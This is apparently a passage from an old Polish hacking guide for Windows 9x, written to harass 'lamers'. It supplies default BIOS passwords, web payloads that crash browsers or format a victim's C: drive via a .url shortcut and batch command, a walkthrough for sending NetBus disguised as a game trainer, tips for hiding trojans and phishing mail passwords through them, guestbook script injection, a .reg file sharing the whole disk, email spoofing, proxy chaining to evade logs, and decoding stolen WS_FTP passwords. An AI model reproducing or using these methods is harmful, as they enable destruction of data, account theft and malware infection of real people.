D) W komputerze na ktrym siedze, jest wprowadzone ograniczenie polegajce na tym, e mog uruchomi tylko
   kilka udostpnionych aplikacji :(
   - BANALNE !!!
     Wystarczy wykona nastpujce czynnoci:
     1.Sprawdzi, czy MS Word jest dotpny
     2.Jeli jest dostpny, to zmieni nazw pliku jakiego nie moemy uruchomi na WINWORD.EXE
   - Oczywicie moemy tak zrobi z kad udostpnion aplikacj, ale pakiet MS Office jest 
     prawie zawsze udostpniony :)
*********************************************************************
7)
HASLO W BIOS'ie:

  Niektrzy LAMO-HACKERZY twierdz, e najlepszym zabezpieczeniem komputera jest wprowadzenie hasa
  w BIOS'ie. To rozwizanie jest dobre, ale tylko dla osb, ktre pierwszy raz widz komputer, lub
  ich zakres rozumowania zaczyna si gdzie koo sapera, a koczy w okolicach pasjansa...
  Kady dobrze wie, e istniej tak zwane standardowe hasa do BIOS'a.
  Oto kilka przykadw:

NAZWA BIOSU                     HASLO
------------------------------------------------------
AMI	                          589589
                                A.M.I.
                                aammii
                        	  AMI
	                          AMI!SW
        	                    AMI.KEY
                	              ami.kez
                        	  AMI?SW
	                          AMI_SW
                                AMI~
                                ami-
                                amiami
                                amidecod
                                AMIPSWD
                                amipswd
                                AMISETUP
                                bios310
                                BIOSPASS
                                CMOSPWD
                                helga-s
                                HEWITT RAND
                                KILLCMOS

Amptron                         Polrty

AST                             SnuFG5

Award                           ?award
                                01322222
                                1EAAh
                                256256
                                589589
                                589721
                                admin
                                alfarome
                                aLLy
                                aPAf
                                award
                                AWARD SW
                                award.sw
                                AWARD?SW
                                award_?
                                award_ps
                                AWARD_PW
                                AWARD_SW
                                awkward
                                BIOS
                                bios*
                                biosstar
                                biostar
                                CONCAT
                                condo
                                CONDO
                                djonet
                                efmukl
                                g6PJ
                                h6BB
                                HELGA-S
                                HEWITT RAND
                                HLT
                                j09F
                                j256
                                j262
                                j322
                                j64
                                lkw peter
                                lkwpeter
                                PASSWORD
                                SER
                                setup
                                SKY_FOX
                                SWITCHES_SW
                                Sxyz
                                SZYX
                                t0ch20x
                                t0ch88
                                TTPTHA
                                ttptha
                                TzqF
                                wodj
                                ZAAADA
                                zbaaaca
                                zjaaadc

Biostar                         Biostar
                                Q54arwms

Compaq                          Compaq

Concord                         last

CTX International               CTX_123

CyberMax                        Congress

Daewoo                          Daewuu

Daytek                          Daytec

Dell                            Dell

Digital Equipment               komprie

Enox                            xo11nE

Epox                            central 

Freetech                        Posterie

HP Vectra                       hewlpack

IBM                             IBM
                                MBIUO
                                sertafu

Iwill                           iwill

JetWay                          spoom1

Joss Technology                 57gbz6
                                technolgi

M Technology                    mMmM

MachSpeed                       sp99dd

Magic-Pro                       prost

Megastar                        star

Micron                          sldkj754
                                xyzall

Micronics                       dn_04rjc

Nimble                          xdfk9874t3

Packard Bell                    bell9

QDI                             QDI

Quantex                         teX1
                                xljlbj

Research                        Col2ogro2

Shuttle                         Spacve

Siemens Nixdorf                 SKY_FOX

SpeedEasy                       lesarot1

SuperMicro                      ksdjfg934t

Tinys                           tiny

TMC                             BIGO

Toshiba                         24Banc81
                                Toshiba
                                toshy99

Vextrec Technology              Vextrex

Vobis                           merlin

WIMBIOSnbsp BIOS v2.10          Compleri

Zenith                          3098z
                                Zenith

ZEOS                            zeosx


P.S Standardowym hasem do BIOS'u jest zazwyczaj nazwa producenta lub co co jest z nim zwizane...

Jesli nie uda ci sie zlamac haselka, to pozostaje wyjecie baterii podtrzymujacej BIOS 
(musisz ja wyjac na jakas godzine), ale potem musimy od nowa ustawic CALY BIOS !!!

UWAGA: Podczas wpisywania hasa, bios rozrnia wielko liter !!!
*********************************************************************
8)
 Bdy w IE:
 
    KADY program posiada jakie by, jedne s ju poprawione, inne s od lat i nikt o nich
nie pamita. Zajmiemy si tymi drugimi. Programem ktry na swoim dysku ma 100% uytkownikw
Window$a jest Internet Explorer. 

------------------------------------------------------------------------------------------------
Jak skasowa WSZYSTKIE hasa w IE (3.0 i 4.01)
Uruchamiamy REGEDIT i usuwamy odpowiedni podklucz z klucza:
hkey_local_machine>Software>microsoft>windows>current version>policies>
------------------------------------------------------------------------------------------------

JAK ZAWIESIC WINGROZE:

Jedyne co wystarczy zrobi to utworzy dowoln strone internetow, a na jej pocztek wpisa:

-------/ KOD PROGRAMU /-----
<html>
<body>
<iframe src="index.htm">
</iframe>
</body>
</html>
-------/ KOD PROGRAMU /-----
(ten program dziala tylka, jesli jest uruchomiony z pliku INDEX.HTM

Drugi programik
-------/ KOD PROGRAMU /-----

PA-PA LAMERZE !!!
<meta http-equiv="Refresh" content="0; URL=file:NIEMOJEWSKI">
<meta http-equiv="Refresh" content="0; URL=file:PETER">

-------/ KOD PROGRAMU /-----

Nastpnie naley tak stron opublikowa w internecie - na darmowym serwerze oczywicie, lub na 
patnym, po uprzednim wamaniu si...
Po publikacji strony wypada nada jej atrakcyjn domene np. przy uyciu serwisu www.free.prv.pl
Naszej stronie moemy nada jedn z przykadowych domen:
 * www.hackerklub.prv.pl
 * www.xlaski.prv.pl
 * www.super_prog.prv.pl
 * www.gry-za-free.prv.pl

Potem moemy zrobi troszk chamski numer:
1.Wchodzimy na czat np. CZAT.ONET.PL i zaczynamy rozmawia.
2.Starajmy si znale jakiego lamera, np. takiego na ktrym chcemy powiczy nasze zdolnoci.
3.Zapytajmy go o adres E-MAIL
4.Potem wymylamy jaki gupi powd, przez ktry musi on wam poda swj IP
5.Dowiadujemy si w co gra nasza ofiara
6.Jeli ofiara lubi gra w Tomb Raidera, to pytamy si czy chciaa by najnowszego treinera 
  do tej gry
7.Jeli ofiara si zgodzi, to wysyamy na podany przez ni adres e-mail NETBUSA, ktrego nazwa
  zostaa wczeniej zmienione z PATCH.EXE na TR_TRAIN.EXE - jeli moemy (i umiemy...) to 
  zmiemy ikone np. za pomoc BORLAND WORKSHOP
8.Gdy okae si, e ofiara nie chce przyj naszego prezentu, to my nie musimy si prosi...
  Za kare wysyamy j na stron powicon jego zainteresowani, a jakim dziwnym sposobem jest
  to ta sama strona, ktr przygotowalimy na pocztku rozdziau HE... HE... HE... 8P

JAK ZAWIESI WINDOWS NT:
(wystarczy wpisa to na strone)

-------/ KOD PROGRAMU /-----
<img src="http://localhost:153" alt="" height=1 width=1 align=left>
-------/ KOD PROGRAMU /-----

------------------------------------------------------------------------------------------------
JAK SFORMATOWAC DYSK PRZEZ WWW:

Wystarczy na naszej stronie umieci:

-------/ KOD PROGRAMU /-----
<a href="test.url">kliknij tutaj</a>
-------/ KOD PROGRAMU /-----

Pozostaje jeszcze stworzyc plik test.url wygladajacy tak:

-------/ KOD PROGRAMU /-----
[InternetShortcut]
URL=file://FORMAT.COM C: /Q
-------/ KOD PROGRAMU /-----

Gdy LAMER kliknie na taki odsylacz, wyskoczy mu tryb Ms-Dos z pytaniem czy chce formatowa dysk C:
Jak omin to pytanie ? To banalnie proste, wystarczy utworzy maego BAT'a z poleceniem:

-------/ KOD PROGRAMU /-----
ECHO T | FORMAT C: /Q /AUTOTEST >NUL
-------/ KOD PROGRAMU /-----

UWAGA: Ten numer dziala tylko na WINDOWS 95
------------------------------------------------------------------------------------------------
JAK ZERWA POCZENIE LAMEROWI:

Wystarczy w nagwku strony na ktr wchodzi lamer wpisa:

-------/ KOD PROGRAMU /-----
<meta http-equiv="Refresh" content="0; URL=www.wp.pl:19">
-------/ KOD PROGRAMU /-----

Spowoduje to wejcie na podany adres na port 19, ktry jest portem chronionym i lamer si rozczy... :))
*********************************************************************
9)

KSIGA GOCI:

Niektrzy lamerzy uywaj na swoich stronach czego co si zwie KSIGA GOCI.
Czy paczc na ochydnie zrobion stron lamersk nie macie ochoty jej usun, lub
chocia co na niej zepsu ???
Jeli macie ochote zrobi ma demolk, do zaczn od wytumaczenia, jak ZNISZCZY
Ksige Goci. Zniszczenie ksigi goci jest niezwykle prost spraw, wystarczy wiedzie,
e 80% takich ksiek interpretuje tekst pisany za pomoc kodu HTML. A co za tym idzie akceptuje
te JavaScript, VBS itp. Majc tak wiedze moemy wpisa jeden z przykadowych wpisw:

Ten wpis powoduje, e gdy kto otworzy ksige goci, to zatnie mu si WINGROZA !!!

-------/ KOD PROGRAMU /-----
PA-PA LAMERZE !!!
<meta http-equiv="Refresh" content="0; URL=file:NIEMOJEWSKI">
<meta http-equiv="Refresh" content="0; URL=file:PETER">
-------/ KOD PROGRAMU /-----


Ten wpis natomiast to co w rodzaju bezpatnej reklamy, powoduje on automatyczne
otwarcie wybranej przez nas strony. (w tym wypadku jest to WWW.PLAYBOY.COM)

-------/ KOD PROGRAMU /-----
<meta http-equiv="Refresh" content="0; URL=http://www.playboy.com">
-------/ KOD PROGRAMU /-----

Moemy te wpisa zwyky ozdobny tekst np: <h1>JESTEM HACKEREM</h1>, jeli znasz si na HTML'u, to
wiesz, e to polecenie spowoduje napisanie wielkimi (najwikszymi) literami podanego przez nas sowa.
*********************************************************************
10)

Trojany:

Konie trojaskie, to stare dobre narzdzia hackerskie. Teraz jednak nie s ju takie grone i
tajemnicze jak dawniej, gdy np. takiego NETBUSA moe wykry kady program antywirusowy 
(nawet polski MKS_VIR). Poza tym konie trojaskie s atwe w obsudze, przez co s uywane
przez lamerw.

Kady dobry hacker musi umie koysta z trojana, chociaby NETBUSA...
Oto 8 przykaza hackera uywajcego trojanw:

1.Uywaj trojana tak, aby ofiara go nie wykrya tz:
   - nie uywaj opcji wyswania CD-ROM
   - Nie wywietlaj adnych obrazkw na ekranie ofiary
   - Nie baw si myszk ofiary (wiem e to fajne...)
2.Ukrywaj trojana na dysku:
   - Staraj si, by trojan by zainstalowany w jakim zakamarku dysku np. w katalogu z gr.
   - Nigdy nie instaluj trojana: na pulpicie, w katalogu C:\, w katalogach tymczasowych
3.Jeli uywasz opcji cigania plikw z dysku ofiary, to nie cigaj plikw wikszych ni 1MB,
  bo ofiara moe si skapn, e to troche dziwn, gdy dysk wiruje jak szalony, a on gra w sapera.
4.Nie atakujmy komputera w godzinach szczytu w sieci - moe to spowodowa zapchanie cza ofiary, 
  rozczenie, zawieszenie systemu itp.
5.Gdy wysyasz jakie okienko informacyjne do ofiary to "nje rup bentuf ortokrawicznyh"
6.Nie wysyaj prymitywnych okienek informacyjnych takich jak:
  - "Pocauj mnie w klawiature - komputer" taki tekst, to ju standard...
  - "Czy na pewno sformatowa dysk C: ?" - to jest tekst wikszoci lamerw...
8.Nie pomyl rodzaju wiadomoci w informacjach np. Nie wysyaj pytania "Czy na pewno sformatowa 
  dysk C: ?" jako ikienko informacyjne z przyciskiem <OK>, lecz aby to wygldao naturalnie, musisz
  wybra opcje PYTANIE (QUESTION) i opcje klawiszy TAK/NIE/ANULUJ (yes/no/cancel) lub TAK/NIE 
  (yes/no)

Oto kilka sztuczek z wykoystaniem trojanw:

a) Zdobycie loginu i hasa logowania:
   1.Wylogowujemy ofiare (trojan zostanie w pamici, a do ponownego zalogowania)
   2.Wybieramy opcje LISTEN (w NETBUS'ie) i podgldamy co pisze nasza ofiara.
   3.Gdy ofiara zaloguje si na nowo, bdziemy musieli ponownie si z ni poczy.
b) Zdobycie hasa do skrzynki pocztowej:
   1.Uruchamiamy program pocztowy na komputerze ofiary opcj START PROGRAM (w NETBUS'ie)
   2.Wysyamy okienko informacyjne z moliwoci wpisania tekstu i z informacj:
     "Wystpi bd 4B2E w module MAIL.DLL \NPoczenie z sieci zostao zerwane
      \NAby odnowi poczenie podaj login i haso do swojego konta pocztowego"
   P.S Polecenie \N powoduje e podany tekst zostanie wywietlony w niszej linijce.

UWAGA: Pamitaj, aby zmieni standardowy port trojana na inny !!!

--------------------------------------------------------------------------------------
WINNUKE:

Winnuke, jak kady wie, to takie fajne co, co potrafi nam zawiesi Windows'a...
Oto jak si zabezpieczy przed t zabawk:

- Uruchom program "regedit.exe" , znajduje sie on w katalogu twoich windows.
- Wejdz do "galezi"
  Hkey_Local_Machine\System\CurrentControlSet\Services\VxD\MSTCP
- Potem nacisnij "Edycja" , "Nowy" , "Wartosc ciagu" i wpisz "BSDUrgent"
- Pozniej nacisnij "Edycja" , "Modyfikuj" i w pole "Dane wartosci" wpisz 0
  (zero)
- Zamknij system i uruchom windows ponownie

UWAGA: Jeli posiadasz Windows 98 lub ME, to Winnuke to ta metoda cie nie obroni...
       Systemy te s odporne na ataki z portu 139, ale przecie jest jeszce tyle innych
       portw...
--------------------------------------------------------------------------------------
Oto spis znanych trojanw i ich standardowe ustawienia portw:

Satanz Backdoor|666
Silencer|1001 
WebEx|1001
Doly Trojan|1011
Psyber Stream Server|1170
Ultors Trojan|1234
VooDoo Doll|1245
FTP99CMP|1492
Shivka-Burka|1600
SpySender|1807
Shockrave|1981
BackDoor|1999
Trojan Cow|2001
Ripper|2023
Bugs|2115
Deep Throat|2140 
The Invasor|2140
Phineas Phucker|2801
Masters Paradise|30129
Portal of Doom|3700
WinCrash|4092
ICQTrojan|4590
Sockets de Troie|5000
Sockets de Troie 1.x|5001
Firehotcker|5321
Blade Runner|5400
Blade Runner 1.x|5401
Blade Runner 2.x|5402
Robo-Hack|5569
DeepThroat|6670
DeepThroat|6771
GateCrasher|6969
Priority|6969
Remote Grab|7000
NetMonitor|7300
NetMonitor 1.x|7301
NetMonitor 2.x|7306
NetMonitor 3.x|7307
NetMonitor 4.x|7308
ICKiller|7789
Portal of Doom|9872
Portal of Doom 1.x|9873
Portal of Doom 2.x|9874
Portal of Doom 3.x|9875
Portal of Doom 4.x|10067
Portal of Doom 5.x|10167
iNi-Killer|9989
Senna Spy|11000
Progenic trojan|11223
Hack?99 KeyLogger|12223
GabanBus|1245
NetBus|1245
Whack-a-mole|12361
Whack-a-mole 1.x|12362
Priority|16969
Millennium|20001
NetBus 2 Pro|20034
GirlFriend|21544
Prosiak|22222
Prosiak|33333
Evil FTP|23456
Ugly FTP|23456
Delta|26274
Back Orifice|31337
Back Orifice|31338
DeepBO|31338
NetSpy DK|31339
BOWhack|31666
BigGluck|34324
The Spy|40412
Masters Paradise|40421
Masters Paradise 1.x|40422
Masters Paradise 2.x|40423
Masters Paradise 3.x|40426
Sockets de Troie|50505
Fore|50766
Remote Windows Shutdown|53001
Telecommando|61466
Devil|65000
The tHing|6400 
NetBus 1.x|12346 
NetBus Pro  20034 
SubSeven|1243 
NetSphere|30100  
Silencer |1001 
Millenium |20000 
Devil 1.03 |65000 
NetMonitor| 7306 
Streaming Audio Trojan| 1170 
Socket23 |30303 
Gatecrasher |6969  
Telecommando | 61466 
Gjamer  |12076 
IcqTrojen| 4950 
Priotrity  |16969 
Vodoo | 1245 
Wincrash | 5742 
Wincrash2|  2583 
Netspy  |1033 
ShockRave | 1981 
Stealth Spy  |555 
Pass Ripper  |2023 
Attack FTP  |666 
GirlFriend | 21554 
Fore, Schwindler|  50766 
Tiny Telnet Server| 34324 
Kuang   |30999 
Senna Spy Trojans|   11000 
WhackJob  | 23456 
Phase0  | 555 
BladeRunner |  5400 
IcqTrojan | 4950 
InIkiller  | 9989 
PortalOfDoom |  9872 
ProgenicTrojan |  11223 
Prosiak 0.47  | 22222 
RemoteWindowsShutdown |  53001 
RoboHack  |5569 
Silencer  | 1001 
Striker | 2565 
TheSpy |  40412 
TrojanCow |  2001 
UglyFtp | 23456 
WebEx  |1001 
Backdoor |  1999 
Phineas  | 2801 
Psyber Streaming Server | 1509 
Indoctrination  | 6939 
Hackers Paradise |  456 
Doly Trojan  | 1011 
FTP99CMP |  1492 
Shiva Burka |  1600 
Remote Windows Shutdown |  53001 
BigGluck, | 34324 
NetSpy DK |  31339 
Hack?99 KeyLogger | 12223 
iNi-Killer  | 9989 
ICQKiller | 7789 
Portal of Doom |  9875 
Firehotcker  | 5321 
Master Paradise |40423 
BO jammerkillahV |  121 

Jeli po wpisaniu w DOS'ie "NETSTAT -a" zobaczymy, e ktry z tych portw jest otwarty, to napewno
mamy jakiego trojana !!!
---------------------------------------------------------------------
Znany jest mi take tak zwany "Trojan Bill'a Gatesa"
Wystarczy utworzy plik REG (np. BILL_G.REG) i wpisa w nim:

<----TO WPISA---->
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
\GETMEOUT]
"Flags"=dword:00000192
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"="full acces"
<----TO WPISA---->

Uruchomienie takiego skryptu spowoduje udostpnienie swojego dysku C: w sieci lokalnej, wraz
z penymi uprawnieniami do niego...
*********************************************************************
11)
 Sztuczki do zncania si nad lamerami:

a) Utrudniacz startu:
   Aby napisa program utrudniajcy start komputera, wystarczy utworzy nowy plik wsadowy,
   a w nim wpisa polecenie:
   RUNDLL32 USER,ExitWindows
   Tak utworzony plik wsadzamy do autostartu lamera i nadajemy mu atrybut UKRYTY i TYLKO DO ODCZYTU
   EFEKT: Za kadym razem gdy lamer uruchomi Windows'a i zobaczy pulpit, zamknie mu si system
b) "Niszczenie" katalogu z grami:
   Troch to dziecinne, ale trudno...
   BARDZO brutalnym sposobem ;) zncania si nad lamerem jest nadanie atrybutu UKRYTY folderowi
   z grami.
   UWAGA: Takie zachowanie moe doprowadzi lamera do zapaci psychicznej, stresw, kompleksw itp.
*********************************************************************
12)
Podszywanie sie za kogos (E-mail) - OutLookExpress:

Cay trik polega na tym, e prbujemy otrzyma takie oto dziwado:
- List ma mie podanego przez nas nadawce i temat.
Robimy to w ten sposb:
1.Uruchamiamy Outlook Express
2.Wybieramy NARZEDZIA>KONTA...>POCZTA> i klikamy (dwa razy) na nasze konto (u mnie jest to: POP3.WP.PL)
3.Uruchamiaj si waciwoci naszego konta
4.We waciwociach konta widzimy cztery pola, ktre musimy odpowiednio wypeni, oto przykad:

<--------------------------------->
Nazwa: Bill Gates
Organizacja: Microsoft Corporation
Adres e-mail: billgates@microsoft.com
Adres zwrotny: billgates@microsoft.com
<--------------------------------->

i nacisnij OK.
Teraz napisz list i zaadresuj go na jakiego lamera, lub na swoj nielubian nauczycielke...
Gdy ofiara odbierze wiadomo okarze si, e pisa do niej sam Bill Gates !!!
*********************************************************************
13)
Ukrywanie numeru IP:

Aby ukry swj numer IP wystarczy uywa serwera Proxy np.: w3cache.tpnet.pl [Telekomuna s.(r).a]
Dziki temu, w logach systemowych zamiast twojego IP, bdzie IP serwera Proxy, a taki to moe mie nawet
milion osb jednoczenie, wic uywaj serwerw Proxy kiedy si tylko da !!!

UWAGA: Uywaj tylko anonimowych i sabo kontrolowanych serwerw, podany wczeniej przykad to
       standardowy serwer Proxy udostpniany przez TP, wic nie jest on szczeglnie bezpieczny,
       ale zawsze lepsze to ni nic...
P.S Ja polecam serwer Proxy www.iproxy.com (jest anonimowy i sabo kontrolowany)
---------------------------------------------------------------------
Ukrywanie nazwy komputera:

W pliku rejestru (np. xxx.reg) wystarczy wpisa:

<--------------XXX.REG------------------>
REGEDIT4

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\
ComputerName]
"ComputerName"="SHADOWED"
<--------------XXX.REG------------------>

Po uruchomieniu takiego skryptu, aden inny komputer nie bdzie mg odczyta naszej nazwy...
Technika ta jest szczeglnie polecana w sieciach lokalnych, gdy dziki temu moemy kasowa,
wgrywa i zmienia pliki, a nigdzie nie bdzie ani swka o tym, e to my zrobilimy :)
---------------------------------------------------------------------
Uywanie Anonymizera:

Zawsze naturalnie mona uy anonymizerw dostpnych w sieci. Ukrywaj one wikszo (ale nie wszystkie) danych
o nas midzy innymi: nasz IP, OS, przegldarka, itp.
Oto adresy do kilku popularnych (i skutecznych) anonymizerw:
- www.anonymizer.com
- www-cache.rz.uni-karlsruhe.de:3128

Sposb na robienie w konia Adminw:

Sposb ten jest uywany przy ponad 62% wama. 
Nazywany jest on potocznie Ptelk.
Oto jak go wykona:
1.Ustawiamy sobie serwer Proxy na www.iproxy.com
2.Wchodzimy na www.anonymizer.com
3.Z serwera www.anonymizer.com czymi si z www-cache.rz.uni-karlsruhe.de:3128
4.Z tego serwera czymy si ponownie z www.anonymizer.com
5.Powtarzamy punkty od 2 do 4 okoo 10 razy.

P.S Do wykonania tej sztuczki mona uy innych anonymizerw, ale pamitajcie, e
    najbezpieczniej jest, gdy te dwa anonymizery le w rnych krajach (lub na innych kontynentach)
*********************************************************************
14)

Zabawa z rejestrem:

Wszystkie opisane tu ZABAWKI s bezpieczne, ale przed ich uyciem zrb sobie lepiej kopie rejestru...


Pamitacie jeszcze C64 ? jeli nie, to uruchomcie ten pliczek...

<--------------TERROR.REG------------------>

REGEDIT4

[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:95,00,00,00
"NoSetFolders"=dword:00000001
"NoDrives"=dword:03ffffff
"NoClose"=dword:00000001
"NoDesktop"=dword:00000001

[HKEY_USERS\.Default\Control Panel\desktop\WindowMetrics]
"IconSpacingFactor"="100"
"BorderWidth"="-300"
"ScrollWidth"="-1500"
"ScrollHeight"="-1500"
"MenuWidth"="-370"
"MenuHeight"="-370"
"IconVerticalSpacing"="-1725"

[HKEY_USERS\.Default\Control Panel\Mouse]
"SwapMouseButtons"="1"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Display\0001\DEFAULT]
"CRTXSize"="640"
"CRTYSize"="480"
"x_res"="800"
"y_res"="600"
"Resolution"="320,200"

[HKEY_LOCAL_MACHINE\Config\0001\Display\Settings]
"BitsPerPixel"="16"
"Resolution"="320,200"
"MouseTrails"="0"
<--------------TERROR.REG------------------>

---------------------------------------------------------------------
Oto opis najwaniejszych kluczy w rejestrze (z jerry-FAQ):

<----Klucze---->
HKEY_LOCAL_MACHINE (HKLM) - komputer. W tej grupie zapisana jest konfiguracja sprztowa 
                            oraz konfiguracja zainstalowanych aplikacji i samego systemu operacyjnego. 
                            Wszystkie te ustawienia zapisane s w pliku SYSTEM.DAT. 

	HKEY_USER (HKU) - uytkownicy. Tutaj zapisane s profile konfiguracji uytkownikw 
                        oraz ustawienia niektrych aplikacji, indywidualne opcje drukowania i ustawienia sieci. 
                        Dane zapisane s w pliku USER.DAT. 

	HKEY_CLASSES_ROOT (HKCR) - jest wskanikiem do HKEY_LOCAL_MACHINE\Software\Classes.
	HKEY_CURRENT_CONFIG (HKCC) jest kopi HKEY_LOCAL_MACHINE\Config\numer wykrytej konfiguracji 

	HKEY_CURRENT_USER (HKCU) - kopia HKEY_USER\nazwa zalogowanego uytkownika 

	HKEY_DYN_DATA (HKDD) - ta grupa zmienia si dynamicznie i jest przechowywana w pamici RAM

Jeli przy komputerze pracuje wielu uytkownikw (czsto niedowiadczo-nych) warto 
jest zabezpieczy komputer przed uszkodzeniem. Nieprawidowe posugiwanie si niektrymi 
narzdziami moe doprowadzi do katastrofy. Windows posiada moliwo ograniczenia uprawnie
dla rnych uytkownikw. Nie mona jednak ukry jakich katalogw przed innymi uytkownikami.
Do tego celu su specjalne programy. Jednoczenie kade zabezpieczenie da si w bardzo 
prosty sposb obej, ale trzeba wiedzie jak. Poniej przedstawiam kilka podstawowych kluczy,
ktrymi da si zabezpieczy niektre sytuacje. Uaktywnienie wymienionych wartoci wymaga 
dopisania ich do odpowiednich kluczy i nadanie wartoci binarnej 1. 

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network 

	HideSharePwds - ukrywanie hase udostpniania poprzez zastpienie ich na ekranie gwiazdkami 

	DisablePwdCaching - wyczenie buforowania hase 

	AlphanumPwds - wymaganie korzystania z hasa alfanumerycznego 

	MinPwdLen - minimalna dugo hasa 

	NoDialIn - brak moliwoci odbierania telefonu 

	NoPrintSharing - brak moliwoci udostpniania drukarek innym uytkownikom 

Kolejne klucze tycz si ju konkretnego uytkownika, czyli w kategorii HKEY_CURRENT_USER lub HKEY_USER\uytkownik

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

	NoDispCPL - wyczenie dostpu do waciwoci ekranu

	NoDispBackgroundPage - wyczenie dostpu do zakadki waciwoci ekranu TO

	NoDispScrSavPage - wyczenie dostpu do zakadki waciwoci ekranu WYGASZACZ EKRANU 

	NoDispApperancePage - wyczenie dostpu do zakadki waciwoci ekranu WYGLD 

	NoDispSettingsPage - wyczenie dostpu do zakadki waciwoci ekranu USTAWIENIA 

	NoSecCPL - wyczenie dostpu do arkusza waciwoci HASA 

	NoPwdPage - wyczenie dostpu no zakadki ZMIE HASO arkusza HASA 

	NoAdminPage - wyczenie dostpu do zakadki ZDALNE 	ADMINISTROWANIE arkusza HASA 

	NoProfilePage - wyczenie dostpu do zakadki PROFILE UYTKOWNIKA arkusza HASA 

	NoDevMgrPage - wyczenie dostpu do zakadki MENADER URZDZE arkusza SYSTEM

	NoConfigPage - wyczenie dostpu do zakadki PROFILE SPRZTU arkusza SYSTEM 

	NoFileSysPage - wyczenie dostpu do arkusza wciwoci SYSTEM PLIKW 

	NoVirtMemPage - wyczenie dostpu do arkusza wciwoci PAMI WIRTUALNA 

	DisableRegistryTools - wyczenie dostpu do Edytora Rejestru 

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network 

	NoNetSetup - wyczenie dostpu do waciwoci sieci 

	NoNetSetupIDPage - wyczenie dostpu do zakadki waciwoci sieci IDENTYFIKACJA 

	NoNetSetupSecurityPage - wyczenie dostpu do zakadki waciwoci sieci KONTROLA DOSTPU 

	NoFileSharingControl - brak kontroli nad wspuytkowaniem plikw 

	NoPrintSharingControl - brak kontroli nad wspuytkowaniem drukarek 

	NoEntireNetwork - brak folderu CAA SIE 

	NoWorkgroupContents - brak skadnikw grup roboczych w OTOCZENIU SIECIOWYM 

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 

	NoPrinterTabs - ukrycie zakadek OGLNE i SZCZEGӣY arkusza waciwoci drukarek 

	NoDeletePrinter - brak moliwoci usuwania drukarek 

	NoAddPrinter - brak moliwoci dodawania drukarek 

	NoStartMenuSubFolders - ukrywa podfoldery menu START 

	NoRun - brak polecenia RUN 

	NoSetFolders - brak polecenia USTAWIENIA w menu START 

	NoSetTaskbar - brak waciwoci paska zada 

	NoFind - brak polecenia ZNAJD 

	NoDrives - brak dostpu do dyskw logicznych (tyle jedynek ile 	kolejnych dyskw ma by ukrytych) 

	NoNetHood - brak dostpu do OTOCZENIA SIECIOWEGO 

	NoDesktop - brak pulpitu 

	NoClose - brak moliwoci zamknicia Windows 

	NoSaveSettings - wyczone zachowywanie ustawie przy wyjciu z 	Windows 

	RestorictRun (Klucz) - lista dozwolonych aplikacji 

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp

	Disabled - brak moliwoci uruchamiania aplikacji DOS'u 

	NoRealMode - brak moliwoci uruchamiania aplikacji DOS'u w trybie pojedynczej aplikacji 

Wszyscy znamy problem z anonimowym logowaniem. Przy wyborze uytkownka wciskamy klawisz 
ANULUJ, lub piszemy nie znanego uytkownika i co ??? Logujemy si.... 
Konfiguracje wszystkich uytkownikw zapisane s w kategorii HKEY_USERS w kluczach 
odpowiadajcych nazwom uytkownikw. Jest tam rwnie uytkownik o nazwie .Default. 
Jego konfiguracja jest konfiguracj domyln. Jednym ze sposobw ograniczenia powyszych 
sytuacji jest skasowanie tego uytkownka lub ograniczenie mu rnych uprawnie.

Informacje o zarejestrowanym uytkowniku 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

	RegisteredOwner - nazwa uytkownika 
	RegisteredOrganization - nazwa organizacji 
	ProductId - identyfikator produktu 
	Version - nazwa wersji 
	VersionNumber - numer wersji 

Inne

HKEY_CURRENT_USER\Control Panel\desktop 

	MenuShowDelay - czas zwoki wywietlania podmenu menu START (Cig 0-65534) 

	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - tutaj znajduj si uruchamiane aplikacje 

	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices - uruchomione przed logowaniem 

	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall - Dodaj/Usu programy 
<----Klucze---->

*********************************************************************
15)

Program WS_FTP, czyli program do publikowania stron WWW:

Wikszo z nas zna program WS_FTP, jest to banalne w uyciu narzdzie do publikowania stron WWW (sam go uywam...)
Odkryto w nim bardzo wan (dla hackerw) dziur... program zapisuje zakodowane haslo w pliku WS_FTP.INI

Plik WS_FTP.INI, moe wyglda np. tak:

     [pliczek]
      HOST=ftp.lamerzy.org
      UID=lamer
      PWD=616F71717D727B7A48
      LOCDIR=D:\
      DIR=/

W linijce UID podany jest NIE zaszyfrowany indentyfikator uytkownika...
W linije nazwanej PWD jest zakodowane haso, zasada amania hasa jest dziecinnie prosta...

WYSTARCZY:
1.Zaatwi sobie tablice kodw ASCII...
2.Uruchomi kalkulatorek naukowy...
3.Haso zapisane jest w nastpujcy sposb:
 - Do kodu danej litery w hale jest dodawana liczba bdca jej pozycj(zaczynajc od zera), nastpnie
   otrzymany wynik jest konwertowany na system HEX...

Prawda e banalne...
Pamitajcie tylko, e w hale liczby HEX'a zajmuj DWIE cyferki, oto przykad hasa:

PWD=31

Oto jak naley to rozkodowa:
1.Zamieniamy liczb 31 na system DEC (kalkulatorem), wynik=49
2.Od liczby odejmujemy jej pozycje (w tym przypadku 0) wynik=49
3.Odszukujemy w tabeli ASCII znak o otrzymanym kodzie (kod znaku=49) wynik=1
4.Dziki temu wiemy, e haso do strony brzmi "1"

Jak znale plik WS_FTP.INI ?

Czsto jest on w folderze z opublikown stron...
Mona go znale za pomoc polecenia:

<------Bardzo dlugie polecenie------>
http://ftpsearch.ntnu.no/ftpsearch?query=ws_ftp.ini&doit=Search&type=Case+in
  sensitive+substring+search&hits=5000&matches=&hitsprmatch=&limdom=&limpath=&
